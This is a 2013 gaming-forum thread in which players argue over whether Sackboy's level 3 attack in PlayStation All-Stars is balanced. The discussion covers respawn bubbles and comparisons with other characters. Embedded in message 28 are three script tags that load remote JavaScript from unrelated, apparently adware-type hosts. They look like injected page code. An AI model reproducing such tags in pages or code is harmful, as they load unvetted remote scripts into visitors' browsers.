Uncharted Territory
1808 posts

Re: Do You Think Sackboys Level3 Needs a Fix

Feb 11, 2013

Maybe the real question shouldn't be about changing his level 3, maybe it should be about his level 1. It's the same as parappa's, but better since he has the up throw set up. 

See more on Know Your Meme
Message 21 of 64 (124 Views)
0 Likes
Lombax Warrior
250 posts

Feb 11, 2013

Im just comming from a sackboy perspective (I main with him) its hard to puul some combos off with sackboy (NO I DONT JUST USE MY CAKE) because his combos a a little slow, (UNLIKE KRATOS WHEN YOU JUST MASH SQUARE) so it is hard to try to get to lvl 3, and when you got others attacking you midcombo it just gets hard! SO once you do get to lvl 3 its so dang rewarding! so just keep him how he is! and the one who should be nerf is kratos!

Frist to find Sackboy's, Zeus level 3 glitch!
Message 22 of 64 (120 Views)
0 Likes
First Son
18 posts

Feb 11, 2013

I think they should just change one little thing.

If you jump high into the air (as enemy) while someone activates his Level 3, you stay there (ex: while Dantes Level3 you are frozen at that place IN THE AIR were you are). But when Sackboy activates his Level 3 you get dropped tot the Ground, that's really annoying :/

It's ok to respawn in Bubbles, but give the Enemies a chance for a better position before the first Kill!!!

Message 23 of 64 (110 Views)
0 Likes
Lombax Warrior
216 posts

Feb 11, 2013

sprocideon wrote:

Yes. Players don't respawn into boxes for Raiden's level 3, or into a float state for Dante's level 3. So the fact that players keep spawing in bubbles for sackboy's is pretty annoying.

Edit: I take back my statement, sackboy's level 3 is pretty fair. It mostly just depends on the size of stage.

No you were right. I think this should be a fix for his level 3 and the same thing for Drake's level 3, it's only fair to Dante and Raiden that this should happen.

Photobucket
Message 24 of 64 (103 Views)
0 Likes
Uncharted Territory
1808 posts

Feb 11, 2013

Xaltis wrote:

sprocideon wrote:

Yes. Players don't respawn into boxes for Raiden's level 3, or into a float state for Dante's level 3. So the fact that players keep spawing in bubbles for sackboy's is pretty annoying.

Edit: I take back my statement, sackboy's level 3 is pretty fair. It mostly just depends on the size of stage.

No you were right. I think this should be a fix for his level 3 and the same thing for Drake's level 3, it's only fair to Dante and Raiden that this should happen.

Maybe if the characters respawned outside of the bubbles, but sackboy has increased speed to chase runners. That way his level 3 is more like Raiden's and Dante's, as all of the characters rely on physical contact for the kill. Drake's could be fixed where you don't respawn as zombie/mummy/whateverthings, because he has far more reach with his gun. 

See more on Know Your Meme
Message 25 of 64 (97 Views)
0 Likes
Lombax Warrior
216 posts

Feb 11, 2013

sprocideon wrote:

Xaltis wrote:

sprocideon wrote:

Maybe if the characters respawned outside of the bubbles, but sackboy has increased speed to chase runners. That way his level 3 is more like Raiden's and Dante's, as all of the characters rely on physical contact for the kill. Drake's could be fixed where you don't respawn as zombie/mummy/whateverthings, because he has far more reach with his gun. 

I agree with you, that sounds fair.

Photobucket
Message 26 of 64 (95 Views)
0 Likes
Lombax Warrior
250 posts

Feb 11, 2013
I think its fine on how it is! Sack-boy is fine! I main with him and I think his lvl 3 is fair!
Frist to find Sackboy's, Zeus level 3 glitch!
Message 27 of 64 (89 Views)
0 Likes
Gaming Beast
2167 posts

Feb 11, 2013

Fat_Slapper wrote:
Im so happy they aren't going off every single game anymore. I really don't mind it as much anymore. But I have to agree, make the bubbles move a tad faster or not a respawn after 2 kills to still be fair to lvl 3s like BD, Sly, radec? The third kill really depends on how fast you get that first kill and if they remove their invisibility. It's possible screen clear twice easily, but that extra kill is possible but achievable. Sackboys on a stage lile dojo would probably screen clear 3 times
BD can't actually get 3 kills with his level 3.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 28 of 64 (83 Views)
0 Likes
Hekseville Citizen
406 posts

Feb 11, 2013
I'd like the bubbles to move just a little bit faster. Would make me feel like I actually have a chance. Wouldn't change much since sackboy can easily get bubble at the top of the stage. I'm cool with it, just feel helpless when it's activated.
Message 29 of 64 (82 Views)
0 Likes
I Only Post Everything
1025 posts

Feb 11, 2013
I know I've screen cleared twice and an extra kill. It's not as reliable as the sacks, but I'm almost certain I've done it.
Message 30 of 64 (76 Views)
0 Likes